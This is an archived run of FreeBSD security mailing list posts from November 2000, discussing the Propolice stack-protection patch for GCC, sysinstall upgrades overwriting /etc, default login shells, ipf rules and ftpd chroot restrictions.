[133.83.36.5]) by rins.st.ryukoku.ac.jp (8.9.3+3.2W/3.7W/RINS-1.9.7-NOSPAM) with ESMTP id LAA08101 for ; Thu, 16 Nov 2000 11:52:38 +0900 (JST) Received: from ideon.st.ryukoku.ac.jp (kjm@localhost [127.0.0.1]) by ideon.st.ryukoku.ac.jp (8.9.3/3.7W/kjm-19990628) with ESMTP id LAA46899 for ; Thu, 16 Nov 2000 11:52:38 +0900 (JST) From: kjm@rins.ryukoku.ac.jp (KOJIMA Hajime) To: security@FreeBSD.ORG Subject: FYI: Propolice for gcc-2.95.2 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 16 Nov 2000 11:52:38 +0900 Message-ID: <46896.974343158@ideon.st.ryukoku.ac.jp> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FYI: "Propolice", GCC extension for protecting applications from stack-smashing attacks, for gcc-2.95.2 is now available. ---- KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan [Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 19: 1:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.winstonprep.edu (unknown [63.68.69.130]) by hub.freebsd.org (Postfix) with ESMTP id A5E6B37B479 for ; Wed, 15 Nov 2000 19:01:29 -0800 (PST) Received: from coresyncosxlqv (209.187.169.212) by mail.winstonprep.edu (FirstClass Mail Server v5.50) with SMTP (Sender: jon.slivko@belgacom.net) transient id 77; Wed, 15 Nov 2000 22:01:13 -0500 Message-ID: <000d01c04f79$9d64cd00$d4a9bbd1@coresyncosxlqv> From: "Jonathan M. Slivko" To: "KOJIMA Hajime" , References: <46896.974343158@ideon.st.ryukoku.ac.jp> Subject: Re: Propolice for gcc-2.95.2 Date: Wed, 15 Nov 2000 22:02:05 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for the info -- Jonathan M. Slivko ----- Original Message ----- From: "KOJIMA Hajime" To: Sent: Wednesday, November 15, 2000 9:52 PM Subject: FYI: Propolice for gcc-2.95.2 > FYI: "Propolice", GCC extension for protecting applications from > stack-smashing attacks, for gcc-2.95.2 is now available. > > > > ---- > KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan > [Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 19:57:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1158E37B4CF for ; Wed, 15 Nov 2000 19:57:54 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAG3x7h28556; Wed, 15 Nov 2000 19:59:07 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 19:59:06 -0800 From: Kris Kennaway To: KOJIMA Hajime Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 Message-ID: <20001115195906.A28445@citusc17.usc.edu> References: <46896.974343158@ideon.st.ryukoku.ac.jp> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="PEIAKu/WMn1b1Hv9" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp>; from kjm@rins.ryukoku.ac.jp on Thu, Nov 16, 2000 at 11:52:38AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --PEIAKu/WMn1b1Hv9 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Nov 16, 2000 at 11:52:38AM +0900, KOJIMA Hajime wrote: > FYI: "Propolice", GCC extension for protecting applications from > stack-smashing attacks, for gcc-2.95.2 is now available. > =20 > Very cool..It would be useful to look at the feasibility of integrating this into FreeBSD as an option. Kris --PEIAKu/WMn1b1Hv9 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoTW4kACgkQWry0BWjoQKUoqQCdGeD5Bkmozisz9s88IWL+EfQa HDEAn1FLJlnoW5TOabvKJWoxx7Dw1zD7 =ocNF -----END PGP SIGNATURE----- --PEIAKu/WMn1b1Hv9-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 21:10:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 9846837B4C5 for ; Wed, 15 Nov 2000 21:10:26 -0800 (PST) Received: (qmail 61593 invoked by uid 1000); 16 Nov 2000 05:10:22 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 Nov 2000 05:10:22 -0000 Date: Wed, 15 Nov 2000 23:10:22 -0600 (CST) From: Mike Silbersack To: KOJIMA Hajime Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 16 Nov 2000, KOJIMA Hajime wrote: > FYI: "Propolice", GCC extension for protecting applications from > stack-smashing attacks, for gcc-2.95.2 is now available. > > > > ---- > KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan > [Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/ One thing I'm unclear on is how propolice affects compatibility between modules. Can I use a libc compiled without propolice and an app compiled with it, or vice versa? Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 22: 5:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 97D4137B479; Wed, 15 Nov 2000 22:05:51 -0800 (PST) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id eAG65SI48771; Wed, 15 Nov 2000 22:05:28 -0800 (PST) (envelope-from jkh@winston.osd.bsdi.com) To: Igor Roshchin Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG Subject: Re: problem using sysinstall In-Reply-To: Message from Igor Roshchin of "Wed, 15 Nov 2000 17:58:13 EST." <200011152258.RAA91169@giganda.komkon.org> Date: Wed, 15 Nov 2000 22:05:28 -0800 Message-ID: <48767.974354728@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I wonder if there is a fundamental reason why /etc needs to be > overwritten, or it is just because the sysinstall is doing so. Guys.. This discussion is exceedingly silly. Sysinstall only extracts a fresh /etc when you INSTALL a binary system, just as it will happily format your disk if you choose to label and newfs everything from the appropriate editors. That is why you only choose installation of bin if you want to literally bring your system back to the *exact state* that a newly installed system at that release level would be at. There are many good reasons why someone might want to, such as an /etc directory that was completely spammed or suspect of having been tampered with. If what you're trying to do is actually UPGRADE a system, which is to say take a running system and modify it, then you are supposed to use sysinstall's Upgrade option. Upgrade will present you with many of the appropriate warnings about doing silly things like formatting your disk and it will save your /etc into a temporary directory and resurrect your local/changed files. You have simply been using the wrong option, it sounds like to me, and that's not a compelling argument to change an option which is used for other purposes when used correctly. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 1:21: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [209.146.217.193]) by hub.freebsd.org (Postfix) with ESMTP id DF7C137B4CF; Thu, 16 Nov 2000 01:20:57 -0800 (PST) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with SMTP id eAG9KjD47802; Thu, 16 Nov 2000 04:20:49 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "Rossen Raykov" , Cc: Subject: RE: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) Date: Thu, 16 Nov 2000 04:21:34 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <010701c04f51$8d2659e0$4c00000a@sage> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org does ssh check /etc/shells ? -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Rossen Raykov Sent: Wednesday, November 15, 2000 5:15 PM To: kris@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) Initially the /etc/shells file contains an empty line (between the comments and the first shell). I tough that this is the reason why login is granted on a person without shell in /etc/passwd. But I ware wrong! I removed this line from /etc/shells and even after that I was able to gain root command prompt after a valid password. The shell is /bin/sh Don't this violate the idea of /etc/shells? Regards, Rossen ----- Original Message ----- From: To: Cc: ; Sent: Wednesday, November 15, 2000 4:53 PM Subject: Re: problem using sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 1:58: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id 943A737B4CF for ; Thu, 16 Nov 2000 01:57:58 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id eAG9vbM15360; Thu, 16 Nov 2000 04:57:37 -0500 (EST) Date: Thu, 16 Nov 2000 04:57:37 -0500 (EST) From: Trevor Johnson To: Will Mitayai Keeso Rowe Cc: security@FreeBSD.ORG Subject: RE: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > does ssh check /etc/shells ? Users can run arbitrary commands with ssh, without a shell ever being invoked or (at least on my 4.1.1-RELEASE system) anything being logged. Try this: ssh localhost ls last | head -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 6:15:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 3AFFC37B4CF for ; Thu, 16 Nov 2000 06:15:49 -0800 (PST) Received: (qmail 24483 invoked by uid 0); 16 Nov 2000 14:15:47 -0000 Received: from p3ee21623.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.35) by mail.gmx.net (mail01) with SMTP; 16 Nov 2000 14:15:47 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id HAA04085 for freebsd-security@FreeBSD.ORG; Thu, 16 Nov 2000 07:29:01 +0100 Date: Thu, 16 Nov 2000 07:29:00 +0100 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001116072900.S27042@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok> <20001115192259.Q27042@speedy.gsinet> <20001115125504.Q3759@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001115125504.Q3759@grok>; from sreid@sea-to-sky.net on Wed, Nov 15, 2000 at 12:55:04PM -0800 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 15, 2000 at 12:55 -0800, Steve Reid wrote: > On Wed, Nov 15, 2000 at 07:22:59PM +0100, Gerhard Sittig wrote: > > ipf already has a feature like ppp's MYADDR -- specify > > 0.0.0.0/32 as the IP and issue "ipf -y" when interface > > configuration changes > > I can't get this to work with stock ipf in 4.1-R (ipf v3.4.8). > Nothing gets through. Is 0.0.0.0/32 a recent addition, or is it > or the operator just broken in 4.1-R? I'm not certain, but I have been using it with a 4.0-R plus cvsup machine here for quite a while. My rule of thumb would be: if it's in the examples, the code should handle it. I feel this be have been there for a while. But I didn't bother to consult the CVS log. > > If it's just for variable substitution or conditional > > "compilation", you might find my patch described in > > http://www.freebsd.org/cgi/query-pr.cgi?pr=21989 of interest. > > I thought I saw that mentioned somewhere. I haven't bothered > upgrading ipf though, as all the preprocessing I need can be > done in a few lines of shell script. Well, upgrading ipf won't help in this respect. It's a completely independent patch and probably won't make it into stock ipf, Darren is reluctant to accept it since - as you state yourself, too - it can as well be done outside of the program. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 6:30:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 694E337B4CF for ; Thu, 16 Nov 2000 06:30:38 -0800 (PST) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G44GAZ00.VFD for ; Thu, 16 Nov 2000 15:30:35 +0100 Message-ID: <002501c04fd9$cc305130$8e00a8c0@XGod> From: "Andreas Alderud" To: Subject: Re: FYI: Propolice for gcc-2.95.2 Date: Thu, 16 Nov 2000 15:30:41 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: >Very cool..It would be useful to look at the feasibility of >integrating this into FreeBSD as an option. Probably a good idéa for 4.x series, but hardly needed in 5.x since TrusedBSD gets integrated into it. Release Candidate 1 of 4.2 is already released, no hope of seeing it in the final 4.2 release, or? /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 8:22:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 7120C37B4C5 for ; Thu, 16 Nov 2000 08:22:14 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id D7ED26A904 for ; Thu, 16 Nov 2000 11:22:12 -0500 (EST) Message-ID: <00a001c04fe9$bd403590$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: References: Subject: Re: Shell acces with not specified shell in /etc/shells Date: Thu, 16 Nov 2000 11:24:48 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is not ssh related. It is login related. And the correct question have to be: Is it normal to receive /bin/sh for a login shell if the user account doesn't contain any shell in /etc/passwd? ----- Original Message ----- From: To: ; Cc: Sent: Thursday, November 16, 2000 4:21 AM Subject: RE: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) > does ssh check /etc/shells ? > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Rossen Raykov > Sent: Wednesday, November 15, 2000 5:15 PM > To: kris@FreeBSD.ORG > Cc: security@FreeBSD.ORG > Subject: Shell acces with not specified shell in /etc/shells (Re: problem > using sysinstall) > > > Initially the /etc/shells file contains an empty line (between the comments > and the first shell). > I tough that this is the reason why login is granted on a person without > shell in /etc/passwd. > But I ware wrong! > I removed this line from /etc/shells and even after that I was able to gain > root command prompt after a valid password. > The shell is /bin/sh > > Don't this violate the idea of /etc/shells? > > Regards, > Rossen > > ----- Original Message ----- > From: > To: > Cc: ; > Sent: Wednesday, November 15, 2000 4:53 PM > Subject: Re: problem using sysinstall > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 8:38:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id ED6A937B4C5 for ; Thu, 16 Nov 2000 08:38:37 -0800 (PST) Received: (qmail 62777 invoked by uid 1000); 16 Nov 2000 16:38:36 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 Nov 2000 16:38:36 -0000 Date: Thu, 16 Nov 2000 10:38:36 -0600 (CST) From: Mike Silbersack To: Andreas Alderud Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <002501c04fd9$cc305130$8e00a8c0@XGod> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 16 Nov 2000, Andreas Alderud wrote: > Kris Kennaway wrote: > >Very cool..It would be useful to look at the feasibility of > >integrating this into FreeBSD as an option. >=20 > Probably a good id=E9a for 4.x series, but hardly needed in 5.x since > TrusedBSD gets integrated into it. > Release Candidate 1 of 4.2 is already released, no hope of seeing it in t= he > final 4.2 release, or? >=20 > /Kind regards, > David A. Alderud MAC and stack-smashing protection are certainly not mutally exclusive. Even if the base system is configured with strong access barriers to compromised programs, there is still lesser mischief that can be performed. Additionally, it's very likely that people will still installed wu-ftpd, qpopper, imapd, etc from ports. None of trustedbsd's features will help when confronted with the default behavior of these programs. Stack protection, on the other hand, would have prevented a good amount of the past bugs in these programs, and will likely continue to be a good protection method. Personally, I'd like to see _both_ options be used to their full potential. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 9:25:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id AFD0F37B4C5; Thu, 16 Nov 2000 09:25:36 -0800 (PST) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id JAA08006; Thu, 16 Nov 2000 09:25:26 -0800 (PST) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <200011161725.JAA08006@gndrsh.dnsmgr.net> Subject: Re: problem using sysinstall In-Reply-To: from James Wyatt at "Nov 15, 2000 07:47:26 pm" To: jwyatt@rwsystems.net (James Wyatt) Date: Thu, 16 Nov 2000 09:25:25 -0800 (PST) Cc: kris@FreeBSD.ORG (Kris Kennaway), str@giganda.komkon.org (Igor Roshchin), rraykov@sageian.com, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, 15 Nov 2000, Kris Kennaway wrote: > > On Wed, Nov 15, 2000 at 04:48:39PM -0500, Igor Roshchin wrote: > > > Well, although we all understand what is "The Good Thing", > > > the reality of life makes us to do some compromises. > > > I believe, several (I would even say `many' ) > > > people on this list have done upgrades > > > (either via "make world" or via sysinstall) a) remotely > > > > Many people like to jump out of planes for thrills, too :-) > > Yes, but they receive a *lot* of warnings before they do, they see others > do it and live. Then, of course, they have a parachute too... (^_^) Actually we have 2 parachutes, just in case. And like in the remote upgrade situation one should always have a secondary plan of action incase things go wrong. Thank god for skydivers this secondary plan is clearly layed out, for the remote upgrader it is not always so clear. Sometimes a ``Okay, if it blows chunks I get in the car and go to the remote and fix it.'' is a fine backup plan (usually when the car trip is under the allowable down time for the system.) Other times this is not practical and more carefull planning needs to be done, ie travel cross country via commercial airline to fix a system. > What about not letting a bin extract *overwrite* files? (I know there is > work for that and I haven't offered to do it, but I'm asking to consider > it.) When doing an install from scratch, the mkfs has been run, so the > filesystem is clean. I don't know what to do for binaries for upgrades, > but the current approach doesn't work for that either, right? If you don't overwrite files you didn't do an upgrade. :-) > If I'm off-base, say so and I'll crawl back into the machine room - Jy@ Your not totally offbase in your concerns, but I think your directing them in the wrong direction. Any upgrade should be carefully planned, and to draw some more ``jumping'' related analogies a local upgrade is more like the everyday skydive, and a remote upgrade of a critical system is more like a BASE jump. I don't do a whole lot of planning out at the airfield when banging out a half dozen skydives, I spend 15 minutes packing my main canopy and count on my reserve should I have a problem with it. When doing a BASE jump I'll spend a good hour looking at exit points, landing area, where the cops might be coming from, escape routes, etc. It takes me a hour or two to pack the one and only canopy that _MUST_ save my life. When doing a remote critical upgrade one should take similiar precations, if possible do a little skydiving by upgrading similiar systems that are local to you so that you can catch potential pitfalls before you create a critical problem for yourself. -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 15:32:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id D24EE37B479 for ; Thu, 16 Nov 2000 15:32:50 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eAGNWnQ02628; Thu, 16 Nov 2000 16:32:49 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA69958; Thu, 16 Nov 2000 16:32:48 -0700 (MST) Message-Id: <200011162332.QAA69958@harmony.village.org> To: Mike Silbersack Subject: Re: FYI: Propolice for gcc-2.95.2 Cc: KOJIMA Hajime , security@FreeBSD.ORG In-reply-to: Your message of "Wed, 15 Nov 2000 23:10:22 CST." References: Date: Thu, 16 Nov 2000 16:32:48 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Silbersack writes: : One thing I'm unclear on is how propolice affects compatibility between : modules. Can I use a libc compiled without propolice and an app compiled : with it, or vice versa? It would appear that is the case given that there's a command line option to turn it on and off on a per module basis. Some of the protections look interesting, but some of them won't help too much. Every little bit helps. I'd worry about putting this into the base system. First, I'd worry about the performance impact of all this extra code in the base system. Second, I'd worry about bitrot when we move to new versions of the source. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 16:49:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.hobbydump.com (mail.hobbydump.com [64.46.30.3]) by hub.freebsd.org (Postfix) with SMTP id 6777537B479 for ; Thu, 16 Nov 2000 16:49:30 -0800 (PST) Received: (qmail 76377 invoked by uid 1006); 17 Nov 2000 00:53:48 -0000 Date: Thu, 16 Nov 2000 17:53:48 -0700 From: Sheldon Jones To: freebsd-security@freebsd.org Subject: chroot and ftpd Message-ID: <20001116175348.A76193@hobbydump.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anyone know of a way to have the chroot function in ftpd lock a user into a sub-directory under their user directory. I would like a way to keep the users in a sub-directory under their root dir. Ncftpd has this feature but I really like the ftpd that comes with freebsd. In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles) this will restrict the user to the sub-derectory userfiles under their account. Thank you for your time, Sheldon Jones iHighway.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 16:53:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id C61B737B479 for ; Thu, 16 Nov 2000 16:53:42 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id eAH0rfI21668; Thu, 16 Nov 2000 16:53:41 -0800 (PST) Date: Thu, 16 Nov 2000 16:53:41 -0800 From: Alfred Perlstein To: Sheldon Jones Cc: freebsd-security@FreeBSD.ORG Subject: Re: chroot and ftpd Message-ID: <20001116165340.G18037@fw.wintelcom.net> References: <20001116175348.A76193@hobbydump.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001116175348.A76193@hobbydump.com>; from freebsd@hobbydump.com on Thu, Nov 16, 2000 at 05:53:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Sheldon Jones [001116 16:49] wrote: > Does anyone know of a way to have the chroot function in ftpd lock a user into > a sub-directory under their user directory. I would like a way to keep the > users in a sub-directory under their root dir. Not afaik, but patches for this functionality would probably be accepted. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 16:59:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 755CE37B479 for ; Thu, 16 Nov 2000 16:59:54 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAH10gl58527; Thu, 16 Nov 2000 17:00:42 -0800 (PST) (envelope-from kris) Date: Thu, 16 Nov 2000 17:00:42 -0800 From: Kris Kennaway To: Warner Losh Cc: Mike Silbersack , KOJIMA Hajime , security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 Message-ID: <20001116170042.A58481@citusc17.usc.edu> References: <200011162332.QAA69958@harmony.village.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="liOOAslEiF7prFVr" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011162332.QAA69958@harmony.village.org>; from imp@village.org on Thu, Nov 16, 2000 at 04:32:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --liOOAslEiF7prFVr Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Nov 16, 2000 at 04:32:48PM -0700, Warner Losh wrote: > I'd worry about putting this into the base system. First, I'd worry > about the performance impact of all this extra code in the base > system. Second, I'd worry about bitrot when we move to new versions > of the source. Performance shouldn't be an issue unless you enable the extra bounds checking at compile time. Bitrot is certainly an issue, though. We should at least allow world to be built using a propolice-enabled compiler - though that should be fairly automatic just using CC and CFLAGS. Kris --liOOAslEiF7prFVr Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoUgzoACgkQWry0BWjoQKUOZgCg1a/m1kjZlh3p+ElJU0oF2EXn 6h4AoNj6VxOjHPjV+4qpr5yhjcxeTR6j =lDTp 